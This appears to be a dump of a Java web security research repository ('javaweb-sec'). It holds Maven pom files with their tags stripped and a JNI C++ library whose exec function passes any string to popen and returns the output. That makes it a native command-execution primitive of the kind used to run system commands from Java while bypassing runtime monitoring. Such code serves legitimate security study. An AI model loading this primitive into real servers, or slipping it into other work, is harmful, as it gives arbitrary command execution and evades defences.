2 |
5 |
6 |
7 | javaweb-sec
8 | com.anbai
9 | 1.0.0
10 |
11 |
12 | 4.0.0
13 | javaweb-sec-source
14 | pom
15 |
16 | javase
17 | javaweb-sec-utils
18 |
19 |
20 |
--------------------------------------------------------------------------------
/jni/com_anbai_sec_cmd_CommandExecution.cpp:
--------------------------------------------------------------------------------
1 | //
2 | // Created by yz on 2019/12/6.
3 | //
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include "com_anbai_sec_cmd_CommandExecution.h"
9 |
10 | using namespace std;
11 |
12 | JNIEXPORT jstring
13 |
14 | JNICALL Java_com_anbai_sec_cmd_CommandExecution_exec
15 | (JNIEnv *env, jclass jclass, jstring str) {
16 |
17 | if (str != NULL) {
18 | jboolean jsCopy;
19 | const char *cmd = env->GetStringUTFChars(str, &jsCopy);
20 | FILE *fd = popen(cmd, "r");
21 |
22 | if (fd != NULL) {
23 | string result;
24 | char buf[128];
25 |
26 | while (fgets(buf, sizeof(buf), fd) != NULL) {
27 | result +=buf;
28 | }
29 |
30 | pclose(fd);
31 | return env->NewStringUTF(result.c_str());
32 | }
33 |
34 | }
35 |
36 | return NULL;
37 | }
38 |
--------------------------------------------------------------------------------
/jni/com_anbai_sec_cmd_CommandExecution.h:
--------------------------------------------------------------------------------
1 | /* DO NOT EDIT THIS FILE - it is machine generated */
2 | #include
3 | /* Header for class com_anbai_sec_cmd_CommandExecution */
4 |
5 | #ifndef _Included_com_anbai_sec_cmd_CommandExecution
6 | #define _Included_com_anbai_sec_cmd_CommandExecution
7 | #ifdef __cplusplus
8 | extern "C" {
9 | #endif
10 | /*
11 | * Class: com_anbai_sec_cmd_CommandExecution
12 | * Method: exec
13 | * Signature: (Ljava/lang/String;)Ljava/lang/String;
14 | */
15 | JNIEXPORT jstring JNICALL Java_com_anbai_sec_cmd_CommandExecution_exec
16 | (JNIEnv *, jclass, jstring);
17 |
18 | #ifdef __cplusplus
19 | }
20 | #endif
21 | #endif
22 |
--------------------------------------------------------------------------------
/jni/libcmd.jnilib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AMJIYU/javaweb-sec/68791efd17d0dafd33127da49dc0ed51857ede6b/jni/libcmd.jnilib
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 | 4.0.0
7 | com.anbai
8 | javaweb-sec
9 | 1.0.0
10 | pom
11 |
12 |
13 | javaweb-sec-source
14 |
15 |
16 |
--------------------------------------------------------------------------------